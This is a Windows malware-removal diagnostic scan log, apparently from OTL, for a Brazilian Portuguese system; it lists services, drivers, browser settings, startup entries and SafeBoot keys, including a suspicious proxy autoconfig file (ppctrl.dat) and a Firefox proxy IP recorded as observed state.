SRV - [2010/01/09 21:37:50 | 004,640,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)

SRV - [2010/01/09 21:18:00 | 000,149,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\Source Engine\OSE.EXE -- (ose)

SRV - [2009/07/13 23:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)

SRV - [2009/07/13 23:16:12 | 001,004,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\PeerDistSvc.dll -- (PeerDistSvc)

SRV - [2003/04/18 20:06:26 | 000,008,192 | ---- | M] () [Disabled | Stopped] -- C:\Windows\System32\srvany.exe -- (KMService)

========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\rdvgkmd.sys -- (VGPU)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\drivers\tsusbhub.sys -- (tsusbhub)

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\synth3dvsc.sys -- (Synth3dVsc)

DRV - [2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswsp.sys -- (aswSP)

DRV - [2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswTdi.sys -- (aswTdi)

DRV - [2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswSnx.sys -- (aswSnx)

DRV - [2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt)

DRV - [2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk)

DRV - [2013/10/21 14:12:37 | 000,178,304 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswVmm.sys -- (aswVmm)

DRV - [2013/10/21 14:12:37 | 000,079,720 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr2.sys -- (aswRdr)

DRV - [2013/10/21 14:12:37 | 000,049,944 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswRvrt.sys -- (aswRvrt)

DRV - [2012/09/15 16:59:31 | 000,242,240 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01)

DRV - [2012/08/23 12:44:32 | 000,014,848 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)

DRV - [2012/08/23 12:40:25 | 000,049,664 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\TsUsbFlt.sys -- (TsUsbFlt)

DRV - [2010/11/20 10:30:15 | 000,175,360 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmbus.sys -- (vmbus)

DRV - [2010/11/20 10:30:15 | 000,040,704 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmstorfl.sys -- (storflt)

DRV - [2010/11/20 10:30:15 | 000,028,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\storvsc.sys -- (storvsc)

DRV - [2010/11/20 07:59:44 | 000,035,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb)

DRV - [2010/11/20 07:14:45 | 000,017,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VMBusHID.sys -- (VMBusHID)

DRV - [2010/11/20 07:14:41 | 000,005,632 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vms3cap.sys -- (s3cap)

DRV - [2009/07/13 20:09:17 | 004,194,816 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag)

DRV - [2009/07/13 20:02:50 | 000,211,456 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\e1e6032.sys -- (e1express)

DRV - [2005/02/11 11:19:20 | 000,055,216 | ---- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\k750bus.sys -- (k750bus)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.google.com

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com

IE - HKLM\..\SearchScopes,DefaultScope =

IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope =

IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope =

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope =

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope =

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://br.msn.com/?ocid=iehp

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = pt-br

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 93 66 3B FF A9 7E CC 01 [binary data]

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\..\SearchScopes,DefaultScope = {DB9BCD20-54F3-4A60-9865-B07BC3E63560}

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\..\SearchScopes\{DB9BCD20-54F3-4A60-9865-B07BC3E63560}: "URL" = http://www.google.com/search?hl=en&q={searchTerms}&rlz=1I7GGNI_pt-BRBR507

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "AutoConfigURL" = file://C:\ProgramData\ppctrl.dat

========== FireFox ==========

FF - prefs.js..browser.search.selectedEngine: "Google"

FF - prefs.js..browser.search.useDBForOrder: true

FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:20.0.1

FF - prefs.js..network.proxy.autoconfig_url: "file:///C:\\ProgramData\\ppctrl.dat"

FF - prefs.js..network.proxy.http: "189.112.117.5"

FF - prefs.js..network.proxy.type: 2

FF - user.js - File not found

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll ()

FF - HKLM\Software\MozillaPlugins\@foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf: C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\2011\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\2011\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\daplinkchecker@speedbit.com: C:\Program Files\DAP\daplinkchecker [2013/02/10 01:00:56 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{F17C1572-C9EC-4e5c-A542-D05CBB5C5A08}: C:\Program Files\DAP\DAPFireFox [2013/02/10 01:00:55 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

[2012/10/05 20:47:52 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Extensions

[2013/11/23 15:59:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions

[2013/10/06 10:06:43 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}

[2013/11/23 15:59:57 | 000,382,345 | ---- | M] () (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\firefox\profiles\1t2pwtzw.default\extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi

[2013/10/05 22:41:09 | 000,000,000 | ---D | M] (No name found) -- C:\Arquivos de Programas\Mozilla Firefox\extensions

[2013/10/05 22:41:28 | 000,263,064 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll

[2013/10/05 22:41:22 | 000,001,240 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\buscape.xml

[2013/10/05 22:41:22 | 000,001,425 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\mercadolivre.xml

[2013/10/05 22:41:22 | 000,002,086 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

[2013/10/05 22:41:22 | 000,001,381 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-br.xml

[2013/10/05 22:41:22 | 000,001,165 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-br.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)

CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}

CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},

CHR - homepage: http://www.google.com

CHR - plugin: Widevine Content Decryption Module (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.1.376\_platform_specific\win_x86\widevinecdmadapter.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\PepperFlash\pepflashplayer.dll

CHR - plugin: Chrome Remote Desktop Viewer (Disabled) = internal-remoting-viewer

CHR - plugin: Native Client (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\ppGoogleNaClPluginChrome.dll

CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\pdf.dll

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL

CHR - plugin: Foxit Reader Plugin for Mozilla (Disabled) = C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll

CHR - plugin: Java Deployment Toolkit 7.0.450.18 (Enabled) = C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll

CHR - plugin: Java Platform SE 7 U45 (Enabled) = C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll

CHR - plugin: Google Update (Enabled) = C:\Users\2011\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll

CHR - Extension: YouTube Center = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcegdpionpopahcglnfiiioapcclamdj\2.0.1_0\

CHR - Extension: James White = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm\3_0\

CHR - Extension: DAP Link Checker = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bodfdknjhecmadheclfjkhhiofeagdbh\1.0.1.8_0\

CHR - Extension: Download Accelerator Plus (DAP) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffdcfjdljhbehggjdkdioajnknjcpbjb\2.0.11_0\

CHR - Extension: Windows Media Player Extension for HTML5 = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak\1.0_0\

CHR - Extension: Google Wallet = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\

O1 HOSTS File: ([2009/06/10 19:39:37 | 000,000,824 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts

O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O2 - BHO: (Java Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Arquivos de Programas\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Arquivos de Programas\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

O2 - BHO: (SpeedBit Link Verification Helper) - {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - C:\Arquivos de Programas\DAP\LinkVerifier.dll (Speedbit Ltd.)

O2 - BHO: (Java Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Arquivos de Programas\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O4 - HKLM..\Run: [20131121] C:\Program Files\AVAST Software\Avast\setup\emupdate\2b520615-d68a-4492-a5e4-39b59408a272.exe (AVAST Software)

O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)

O4 - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000..\Run: [F.lux] C:\Users\2011\Local Settings\Apps\F.lux\flux.exe ()

O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation)

O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation)

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3

O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O8 - Extra context menu item: &Download with &DAP - C:\Arquivos de Programas\DAP\dapextie.htm ()

O8 - Extra context menu item: &Verify with DAP - C:\Arquivos de Programas\DAP\dapverify.htm ()

O8 - Extra context menu item: Download &all with DAP - C:\Arquivos de Programas\DAP\dapextie2.htm ()

O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: Sothink Flash Downloader For IE - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra Button: Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra 'Tools' menuitem : Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O13 - gopher Prefix: missing

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 1.6.0_30)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A2789148-CF95-4F73-990F-5895C4E94439}: DhcpNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Arquivos de Programas\Common Files\microsoft shared\Help\hxds.dll (Microsoft Corporation)

O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Arquivos de Programas\Common Files\Skype\Skype4COM.dll (Skype Technologies)

O18 - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)

O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)

O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2009/06/10 19:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]

O34 - HKLM BootExecute: (autocheck autochk *)

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

NetSvcs: FastUserSwitchingCompatibility - File not found

NetSvcs: Ias - C:\Windows\System32\ias.dll (Microsoft Corporation)

NetSvcs: Nla - File not found

NetSvcs: Ntmssvc - File not found

NetSvcs: NWCWorkstation - File not found

NetSvcs: Nwsapagent - File not found

NetSvcs: SRService - File not found

NetSvcs: WmdmPmSp - File not found

NetSvcs: LogonHours - File not found

NetSvcs: PCAudit - File not found

NetSvcs: helpsvc - File not found

NetSvcs: uploadmgr - File not found

MsConfig - StartUpReg: swg - hkey= - key= - C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe (Google Inc.)

MsConfig - State: "services" - 2

SafeBootMin: Base - Driver Group

SafeBootMin: Boot Bus estender - Driver Group

SafeBootMin: Boot file system - Driver Group

SafeBootMin: File system - Driver Group

SafeBootMin: Filter - Driver Group

SafeBootMin: HelpSvc - Service

SafeBootMin: NTDS - File not found

SafeBootMin: PCI Configuration - Driver Group

SafeBootMin: PNP Filter - Driver Group

SafeBootMin: Primary disk - Driver Group

SafeBootMin: sacsvr - Service

SafeBootMin: SCSI Class - Driver Group

SafeBootMin: System Bus estender - Driver Group

SafeBootMin: vmms - Service

SafeBootMin: WinDefend - C:\Arquivos de Programas\Windows Defender\MpSvc.dll (Microsoft Corporation)

SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers

SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive

SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive

SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller

SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc

SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard

SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse

SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters

SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter

SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System

SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive

SafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy

SafeBootMin: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers

SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume

SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

SafeBootMin: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices

SafeBootMin: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices

SafeBootNet: Base - Driver Group

SafeBootNet: Boot Bus estender - Driver Group

SafeBootNet: Boot file system - Driver Group

SafeBootNet: File system - Driver Group

SafeBootNet: Filter - Driver Group

SafeBootNet: HelpSvc - Service

SafeBootNet: Messenger - Service

SafeBootNet: NDIS Wrapper - Driver Group

SafeBootNet: NetBIOSGroup - Driver Group

SafeBootNet: NetDDEGroup - Driver Group

SafeBootNet: Network - Driver Group

SafeBootNet: NetworkProvider - Driver Group

SafeBootNet: NTDS - File not found

SafeBootNet: PCI Configuration - Driver Group

SafeBootNet: PNP Filter - Driver Group

SafeBootNet: PNP_TDI - Driver Group

SafeBootNet: Primary disk - Driver Group

SafeBootNet: rdsessmgr - Service

SafeBootNet: sacsvr - Service

SafeBootNet: SCSI Class - Driver Group

SafeBootNet: Streams Drivers - Driver Group

SafeBootNet: System Bus estender - Driver Group

SafeBootNet: TDI - Driver Group

SafeBootNet: vmms - Service

SafeBootNet: WinDefend - C:\Arquivos de Programas\Windows Defender\MpSvc.dll (Microsoft Corporation)

SafeBootNet: WudfUsbccidDriver - Driver

SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers

SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive

SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive

SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller

SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc

SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard

SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse

SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net

SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient

SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService

SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans

SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters

SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter

SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System

SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive

SafeBootNet: {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers

SafeBootNet: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy

SafeBootNet: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers

SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume

SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

SafeBootNet: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices

SafeBootNet: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices

ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)

ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0

ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll

ActiveX: {2D46B6DC-2207-486B-B523-A557E6D54B47} - C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache

